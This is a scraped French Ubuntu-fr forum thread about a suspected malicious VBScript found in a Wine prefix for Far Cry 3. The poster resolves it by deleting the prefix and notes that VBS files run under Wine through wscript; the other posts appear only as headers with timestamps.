Alors la fin de l'histoire: j'ai trouvé un fichier desktop qui indique comment lancer un script vbs, et dans ce fichier le wineprefix de far cry 3 est indiqué (le jeu que j'essaie de faire fonctionner sur linux, mais bon vu la qualité du truc je pense que c'est une perte de temps)
-> wineprefix de far cry 3 à la poubelle (c'est pas une grosse perte)

Conclusion: oui, un fichier vbs peut être lancée avec wine, mais il faut le lancer comme ça

wine wscript fichier.vbs

(sans wscript il s'attend à trouver un exe)

Merci à tous, je passe en résolu.

Ubuntu-fr

Navigation

Liens de recherche

Annonce

#1 Le 24/03/2020, à 16:06

[Résolu] script malicieux VBscript

#2 Le 24/03/2020, à 17:09

Re : [Résolu] script malicieux VBscript

#3 Le 24/03/2020, à 17:56

Re : [Résolu] script malicieux VBscript

#4 Le 24/03/2020, à 18:42

Re : [Résolu] script malicieux VBscript

#5 Le 24/03/2020, à 18:49

Re : [Résolu] script malicieux VBscript

#6 Le 24/03/2020, à 18:54

Re : [Résolu] script malicieux VBscript

#7 Le 24/03/2020, à 18:55

Re : [Résolu] script malicieux VBscript

#8 Le 24/03/2020, à 18:56

Re : [Résolu] script malicieux VBscript

#9 Le 24/03/2020, à 19:00

Re : [Résolu] script malicieux VBscript

#10 Le 24/03/2020, à 19:00

Re : [Résolu] script malicieux VBscript

#11 Le 24/03/2020, à 19:07

Re : [Résolu] script malicieux VBscript

#12 Le 24/03/2020, à 19:10

Re : [Résolu] script malicieux VBscript

#13 Le 24/03/2020, à 19:13

Re : [Résolu] script malicieux VBscript

#14 Le 24/03/2020, à 19:15

Re : [Résolu] script malicieux VBscript

#15 Le 24/03/2020, à 19:33

Re : [Résolu] script malicieux VBscript

#16 Le 24/03/2020, à 20:46

Re : [Résolu] script malicieux VBscript

#17 Le 24/03/2020, à 21:40

Re : [Résolu] script malicieux VBscript

#18 Le 25/03/2020, à 21:55

Re : [Résolu] script malicieux VBscript

Pied de page des forums